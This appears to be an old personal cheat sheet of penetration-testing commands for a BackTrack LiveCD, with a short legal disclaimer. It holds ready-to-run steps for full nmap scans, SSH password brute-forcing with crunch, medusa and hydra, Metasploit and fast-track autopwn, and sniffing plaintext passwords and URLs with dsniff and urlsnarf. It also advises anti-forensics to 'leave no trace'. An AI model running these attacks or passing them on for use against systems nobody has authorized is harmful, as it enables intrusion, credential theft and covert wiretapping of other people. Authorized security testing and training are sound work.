Disclaimer: be aware of local and federal laws. For the US, sniffing traffic of other users, even on your own network, constitutes wiretapping and is investigated by the Secret service. Classified as a federal felony.
www.usenix.org/event/lisa06/tech/slides/muentz.pdf
Sniff only your own traffic on your own network. If network maintenance is your job, check with a lawyer; the bosses permission is insufficient.
Instead of installing these tools, it's best to run off a LiveCD like backtrack ("leave no trace" applies to both hiking and computing). If saving data is necessary, write to an encrypted USB or hard drive (Truecrypt partition). Anti-forensics doesn't cost much.
To install apps to your box,
On linux,
$ sudo apt-get install nessusd
$ sudo nessus-mkcert
$ sudo nessus-adduser
$ cd /etc/init.d
$ sudo ./nessusd start
sudo apt-get:
xtightvncviewer
tightvncserver on port 5901
virtualbox-ose
meld
wireshark
rapidsvn
mailutils
snort
dsniff
john [the ripper]
bkhive [dumping SAM file contents]
samdump2 [dumping SAM file contents]
virtualbox-ose-modules-2.6.24-19-generic
needed to add "username" to "vboxuser" group
DNS responder:
http://use.perl.org/~hachi/journal/32409
If you set up a virtual network, you can have one box respond to the other box's requests
Boot into BackTrack LiveCD
The following commands are given assuming you won't use them to get in trouble. Don't call me from jail. Some of the commands below will land you in jail, literally, if used on the wrong target.
strong scanning parameters, assuming you don't care about subtlety
# nmap -p1-65535 -PN -sV --version-all -O --osscan-guess -v 10.0.0.1 > 10.0.0.1_scan_nmap_full_20020301.log
Bruteforce SSH
Create a list of passwords/usernames to try. Note: CPU intensive
cd /pentest/password
nice ./crunch 1 5 1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM > alphanumMixedCase.dic
Note: sshhatter has a small password list,
/pentest/password/sshatter/passwords
medusa -d
to see what modules are available
medusa -h 10.0.0.1 -u root -p /pentest/password/sshatter/passwords -M ssh
Hydra was what I use:
hydra -s 22 -L /pentest/password/alphanumMixedCase.dic -P /pentest/password/alphanumMixedCase.dic -t 36 10.0.0.1 ssh2
note: default tasks is 16
Don't reinvent the wheel. Employ autopwn scripts:
https://wiki.remote-exploit.org/backtrack/wiki/Inguma
# cd /pentest/exploits/inguma
# ./inguma.py
> autoscan
brute force username and passwords: y
fuzz: y
> save kb
> exploit
# cd /pentest/fast-track
# python setup.py install
# ./fast-track.py -i
1 > update fast-track
9 > update everything
p > accept certificate
p > accept certificate
10 > return to main menu
2 > external hacking
3 > autopwn metasploit automated
1 > run metasploit autopwn
-p1-65535 -PN -sV -O -v 10.0.0.1-25
Manually
# cd /pentest/exploits/framework3
sudo apt-get install dsniff tcpxtract
capture plaintext passwords
$ sudo dsniff -i eth0 >> plaintext_passwords_date.log
capture list of URL requests
$ sudo urlsnarf -i eth0 >> urlsnarf_date.log
capture pictures, better than driftnet
$ sudo tcpxtract -d eth0
metasploit GUI usage:
browse to the exploit you'd like to use
right-click on the exploit, execute
choose target (specify IP, version)